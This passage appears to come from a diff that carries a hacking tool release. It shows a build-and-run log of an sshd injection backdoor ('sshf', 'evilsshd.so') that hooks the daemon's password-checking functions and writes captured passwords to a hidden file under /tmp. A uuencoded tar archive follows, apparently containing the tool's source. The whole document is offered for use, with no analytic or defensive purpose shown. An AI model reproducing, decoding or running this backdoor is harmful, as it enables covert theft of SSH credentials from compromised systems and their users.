+checking for executable suffix...
+checking for object suffix... o
+checking whether we are using the GNU C compiler... yes
+checking whether gcc accepts -g... yes
+checking for pam_start in -lpam... yes
+checking for MD5_Update in -lcrypto... yes
+configure: creating ./config.status
+config.status: creating Makefile
+config.status: creating config.h
+gcc -w -fPIC -shared -o evilsshd.so evilsshd.c -lcrypt -lcrypto -lpam  
+-DHAVE_CONFIG_H
+gcc -w -o sshf sshf.c
+root@:/tmp/sshf> ps auwx | grep sshd
+root      9597  0.0  0.3  2840 1312 ?        S    03:04   0:00 sshd
+root@:/tmp/sshf>
+root@:/tmp/sshf> ./sshf 9597 /tmp/sshf/evilsshd.so
+attached to pid 9597
+_dl_open at 0x4023014c
+stopped 9597 at 0x402017ee
+jam! if it jams here, try to telnet into sshd port or smthing
+lib injection done!
+org crypt() at 0x804b860, evil crypt at 0x40265d60
+org getspnam at 0x804afa0, evil getspnam at 0x40265e0c
+org strncmp() at 0x804b8f0, evil strncmp() at 0x40265a84
+org MD5_Update() at 0x804bdf0, evil MD5Update at 0x40265aec
+all done, now quiting...
+root@:/tmp/sshf>
+root@:/tmp/sshf> ssh -l luser 127.0.0.1
+luser@127.0.0.1's password:
+[luser@localhost:~>ls -al /tmp/.sshd_passwordz
+-rw-r--r--    1 root     root          104 Jul 14 03:27 
+/tmp/.sshd_passwordz
+[luser@localhost:~>exit
+
+Enjoy.
+
+ 
+
+begin 644 sshf.tgz
+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
